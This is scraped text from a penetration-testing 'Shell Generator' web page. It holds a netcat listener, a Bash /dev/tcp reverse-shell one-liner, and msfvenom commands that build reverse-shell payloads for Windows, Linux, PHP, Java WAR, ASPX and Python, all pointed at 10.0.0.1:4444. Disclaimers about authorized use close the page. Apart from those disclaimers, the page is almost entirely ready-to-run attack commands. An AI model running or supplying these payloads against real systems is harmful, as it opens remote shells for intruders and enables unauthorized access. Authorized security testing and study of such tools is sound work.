pentest tools/payloads/Shell Generator
Shell Generator
Generate reverse shell commands and payloads for penetration testing
pentest tools
Risk: High
Reverse Shells
Bind Shells
MSFVenom Payloads
Listener Commands
#reverse shell
#bind shell
#metasploit
#payloads
#netcat
#msfvenom
Listener Configuration
Listener Command
$
nc -lnvp 4444
Reverse Shell Commands
Bash #1
Bash #2
Perl
Python
PHP
PowerShell
Ruby
Netcat
Java
$
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
MSFVenom Payloads
Windows EXE
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f exe > shell_4444.exeLinux ELF
msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf > shell_4444.elfPHP
msfvenom -p php/reverse_php LHOST=10.0.0.1 LPORT=4444 -f raw > shell_4444.phpJava WAR
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f war > shell_4444.warASPX
msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f aspx > shell_4444.aspxPython
msfvenom -p cmd/unix/reverse_python LHOST=10.0.0.1 LPORT=4444 -f raw > shell_4444.pyLegal Disclaimer
This tool is intended for educational and authorized security testing purposes only. Use it only on systems you own or on systems where you have explicit, documented permission to perform security assessments. Unauthorized use of this tool against systems you do not own or manage is strictly prohibited and may be illegal. Always act responsibly and within the bounds of all applicable laws and ethical guidelines.
Authorization Required
Only use this tool on systems you own or have explicit written permission to test. Unauthorized scanning or testing is illegal and may result in criminal charges.